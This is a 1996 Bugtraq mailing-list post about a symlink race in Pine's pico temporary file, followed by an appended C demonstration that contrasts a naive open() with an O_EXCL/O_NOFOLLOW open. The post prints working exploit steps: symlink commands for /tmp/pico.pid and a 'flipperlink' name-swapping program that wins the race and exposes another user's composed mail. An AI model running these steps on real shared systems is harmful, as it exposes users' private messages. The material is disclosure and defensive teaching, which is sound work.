[3345] in bugtraq
Re: message rejected: Re: [linux-security] Pine security problem.
daemon@ATHENA.MIT.EDU (Pascal A. Dupuis)
Fri Sep 13 14:24:10 1996
Date: Fri, 13 Sep 1996 10:07:19 +0200
Reply-To: "Pascal A. Dupuis" <dupuis@lei.ucl.ac.be>
From: "Pascal A. Dupuis" <dupuis@lei.ucl.ac.be>
X-To: Rogier Wolff <wolff@rosie.et.tudelft.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199609122339.BAA02443@cave.et.tudelft.nl>
Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward with Linux:
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
The /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could
have a look at the composed message.
I also tried Rogier Wolff's suggestion about the flipperlink program,
running under high processor load to cause swapping (compiling the kernel):
> #include <stdio.h>
> /* Swap the two names forever, so the planted symlink and a harmless name
>    keep changing places while the victim opens /tmp/pico.pid. */
> int main (int argc, char **argv)
> {
>     if (argc != 3) {
>         fprintf (stderr, "usage: %s name1 name2\n", argv[0]);
>         return 1;
>     }
>     while (1) {
>         rename (argv[1], argv[2]);
>         rename (argv[2], argv[1]);
>     }
> }
and run it with:
> cd /tmp
> ln -s hacker.tmp pico.pid
> flipperlink pico.pid bla
Once the alternate editor is invoked, hacker.tmp, if it does not
exist, is created mode 600, owned by the pine user. At this time, the toggle
stops working as long as the alternate editor is running.
The amazing fact is the ownership:
ls -l /tmp
lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp
-rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker> blah: permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis
--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
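The post shows the attack side: a predictable name in /tmp is opened for writing, and open(2) follows whatever symlink the attacker planted there. The added example below is not from the post or from Pine; it reproduces the setup ("touch hacker.tmp; ln -s hacker.tmp pico.pid") in a scratch directory and runs it against two ways of creating the file. The function names (create_like_pico, create_exclusive, run_symlink_demo) and the directory name symlink_demo_dir are this example's own choices, not anything Pine uses.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post attacks: open a predictable name for writing.
   open(2) follows a symlink in the final path component, so with
   "pico.pid -> hacker.tmp" planted, the data lands in the attacker's file.
   Returns an fd or -1. (Illustrative name, not Pine's own code.) */
static int create_like_pico(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened form: O_CREAT|O_EXCL fails with EEXIST if anything at all,
   including a symlink, already sits at that name (POSIX guarantees this
   for symlinks regardless of where they point). O_NOFOLLOW, where the
   platform has it, additionally refuses to follow a symlink (ELOOP).
   Returns an fd or -1 and never writes through a planted link. */
static int create_exclusive(const char *path)
{
    int flags = O_WRONLY | O_CREAT | O_EXCL;
#ifdef O_NOFOLLOW
    flags |= O_NOFOLLOW;
#endif
    return open(path, flags, 0600);
}

enum { DEMO_BOTH_WRONG = 0, DEMO_SAFE_REFUSED = 1, DEMO_SETUP_FAILED = -1 };

/* Rebuild the post's setup inside `dir` (created and removed here), then
   try both opens on pico.pid. Returns DEMO_SAFE_REFUSED when the naive
   open was fooled (its bytes ended up in hacker.tmp) and the exclusive
   open refused with EEXIST or ELOOP. */
static int run_symlink_demo(const char *dir)
{
    char target[512], linkpath[512];
    struct stat st;
    int result = DEMO_BOTH_WRONG;

    if (mkdir(dir, 0700) != 0 && errno != EEXIST)
        return DEMO_SETUP_FAILED;
    snprintf(target, sizeof target, "%s/hacker.tmp", dir);
    snprintf(linkpath, sizeof linkpath, "%s/pico.pid", dir);

    /* attacker: touch hacker.tmp; ln -s hacker.tmp pico.pid */
    int afd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (afd < 0) { rmdir(dir); return DEMO_SETUP_FAILED; }
    close(afd);
    if (symlink("hacker.tmp", linkpath) != 0) {
        unlink(target); rmdir(dir); return DEMO_SETUP_FAILED;
    }

    /* victim, naive: open succeeds and the "draft" is written into hacker.tmp */
    const char msg[] = "secret draft\n";   /* constructed sample content */
    int naive_followed = 0;
    int vfd = create_like_pico(linkpath);
    if (vfd >= 0) {
        ssize_t n = write(vfd, msg, sizeof msg - 1);
        (void)n;
        close(vfd);
        naive_followed = (stat(target, &st) == 0 &&
                          st.st_size == (off_t)(sizeof msg - 1));
    }

    /* victim, hardened: must fail because a symlink already occupies the name */
    int sfd = create_exclusive(linkpath);
    int safe_refused = (sfd < 0 && (errno == EEXIST || errno == ELOOP));
    if (sfd >= 0) close(sfd);

    if (naive_followed && safe_refused)
        result = DEMO_SAFE_REFUSED;

    unlink(linkpath);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_symlink_demo("symlink_demo_dir");
    if (r == DEMO_SAFE_REFUSED)
        puts("naive open wrote through the planted link; O_EXCL open refused it");
    else
        puts("unexpected result; check the scratch directory");
    return r == DEMO_SAFE_REFUSED ? 0 : 1;
}
```

The point the demo makes is the one the post observes indirectly: the data and the mode 600 permissions go to whatever the link points at, so the only reliable defence at the victim side is to refuse a name that already exists (O_EXCL), or better, to use a per-user directory or mkstemp(3) instead of a fixed name in /tmp. Checking with stat() first and then opening does not help, because the flipperlink loop in the post is exactly the race between those two calls.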